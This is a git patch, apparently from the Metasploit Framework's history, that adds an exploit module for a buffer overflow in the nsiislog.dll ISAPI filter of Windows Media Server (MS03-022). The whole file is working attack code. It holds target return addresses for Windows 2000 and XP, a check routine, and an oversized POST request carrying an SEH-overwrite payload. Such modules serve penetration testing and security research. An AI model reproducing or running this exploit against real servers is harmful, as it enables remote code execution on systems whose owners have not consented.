From 18122316e4ec8286d1b9b508b3e503a086ebd194 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 14 Dec 2005 03:15:04 +0000
Subject: [PATCH] This might work :-)

git-svn-id: file:///home/svn/incoming/trunk@3224 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/isapi/iis_nsiislog_post.rb        | 101 ++++++++++++++++++
 1 file changed, 101 insertions(+)
 create mode 100644 modules/exploits/windows/isapi/iis_nsiislog_post.rb

diff --git a/modules/exploits/windows/isapi/iis_nsiislog_post.rb b/modules/exploits/windows/isapi/iis_nsiislog_post.rb
new file mode 100644
index 0000000000..ae231bfba5
--- /dev/null
+++ b/modules/exploits/windows/isapi/iis_nsiislog_post.rb
@@ -0,0 +1,101 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
+
+
+	include Exploit::Remote::HttpClient
+	include Exploit::Remote::BruteTargets
+	include Exploit::Remote::Seh
+	
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'IIS nsiislog.dll ISAPI POST Overflow',
+			'Description'    => %q{
+				This exploits a buffer overflow found in the nsiislog.dll
+				ISAPI filter that comes with Windows Media Server. This
+				module will also work against the 'patched' MS03-019
+				version. This vulnerability was addressed by MS03-022.
+					
+			},
+			'Author'         => [ 'hdm' ],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'OSVDB', '4535'],
+					[ 'MSB', 'MS03-022'],
+					[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
+					[ 'MIL', '30'],
+
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'    => 1024,
+					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
+
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					['Brute Force',            { }],
+					['Windows 2000 -MS03-019', { 'Rets' => [  9769, 0x40f01333 ] }],
+					['Windows 2000 +MS03-019', { 'Rets' => [ 13869, 0x40f01353 ] }],
+					['Windows XP   -MS03-019', { 'Rets' => [  9773, 0x40f011e0 ] }],
+				],
+			'DisclosureDate' => 'Jun 25 2003',
+			'DefaultTarget'  => 0))
+			
+			register_options(
+				[
+					OptString.new('URL', [ true,  "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
+				], self)			
+	end
+	
+	def check
+		c = connect
+		req = c.request({ 'uri' => datastore['URL'] })
+		res = c.send_request(req, -1)
+		
+		if (res and res.body =~ /NetShow ISAPI/)
+			return Exploit::CheckCode::Detected
+		end
+		return Exploit::CheckCode::Safe
+	end
+	
+	def exploit_target(target)
+
+		c = connect
+		
+		buf = ''
+		%w{
+			date time c-dns cs-uri-stem c-starttime
+			x-duration c-rate c-status c-playerid c-playerversion
+			c-playerlanguage cs(User-Agent) cs(Referer) c-hostexe
+		}.each do |field|
+			buf << field + '=' + 'BOOM&'
+		end
+		
+		pat = 'O' * 65535
+		seh = generate_seh_payload(target['Rets'][1])		
+		pat[ target['Rets'][0] - 4, seh.length] = seh
+		buf << pat
+		
+		req = c.request({
+			'uri'          => datastore['URL'],
+			'method'       => 'POST',
+			'user-agent'   => 'NSPlayer/2.0',
+			'content-type' => 'application/x-www-form-urlencoded',
+			'data'         => buf,			
+		})
+		
+		print_status("Sending request...")
+		c.send_request(req, 0)
+		
+		handler
+		disconnect
+	end
+
+end
+end